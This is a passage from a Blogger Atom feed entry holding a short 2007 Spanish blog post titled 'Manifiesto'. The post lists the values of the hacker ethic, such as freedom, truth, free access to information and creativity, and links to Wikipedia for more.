fin de aprender algo más.&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style="font-size:100%;"&gt;&lt;span style="font-family:verdana;"&gt;¿Para empezar os suena lo que os pongo más abajo?, os avanzo que no es el programa electoral de ningún partido político :P&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;&lt;ul&gt;&lt;li&gt;&lt;span style="font-size:100%;"&gt;Pasión&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span style="font-size:100%;"&gt;Libertad&lt;br /&gt;&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span style="font-size:100%;"&gt;Conciencia social&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span style="font-size:100%;"&gt;Verdad&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span style="font-size:100%;"&gt;Anti-Fascismo&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span style="font-size:100%;"&gt;Anti-Corrupción&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span style="font-size:100%;"&gt;Lucha contra la alienación del hombre&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span style="font-size:100%;"&gt;Igualdad-social&lt;br /&gt;&lt;span style="text-decoration: underline;"&gt;&lt;/span&gt;&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span style="font-size:100%;"&gt;Libre acceso a la información&lt;span style="text-decoration: underline;"&gt;&lt;/span&gt;&lt;a href="http://es.wikipedia.org/wiki/Conocimiento_libre" title="Conocimiento libre"&gt;&lt;br /&gt;&lt;/a&gt;&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span style="font-size:100%;"&gt;Valor social (reconocimiento entre semejantes)&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span style="font-size:100%;"&gt;Accesibilidad&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span style="font-size:100%;"&gt;Actividad&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span style="font-size:100%;"&gt;Preocupación responsable&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span style="font-size:100%;"&gt;Creatividad&lt;br /&gt;&lt;/span&gt;&lt;/li&gt;&lt;/ul&gt;&lt;span style="font-size:100%;"&gt;&lt;span style="font-family:verdana;"&gt;Mas información: &lt;a href="http://es.wikipedia.org/wiki/%C3%89tica_hacker"&gt;http://es.wikipedia.org/wiki/%C3%89tica_hacker&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Haceros una idea de por donde van a ir los tiros...&lt;br /&gt;&lt;br /&gt;Cambio y corto!&lt;/span&gt;&lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1821337150970789352-7293819287716864720?l=cronicasdesid.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://cronicasdesid.blogspot.com/feeds/7293819287716864720/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=1821337150970789352&amp;postID=7293819287716864720' title='0 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/1821337150970789352/posts/default/7293819287716864720'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/1821337150970789352/posts/default/7293819287716864720'/><link rel='alternate' type='text/html' href='http://cronicasdesid.blogspot.com/2007/09/buenas-mediante-este-medio-tan-poderoso.html' title='Manifiesto'/><author><name>StArScReAm</name><uri>http://www.blogger.com/profile/04029801669133895362</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry></feed>
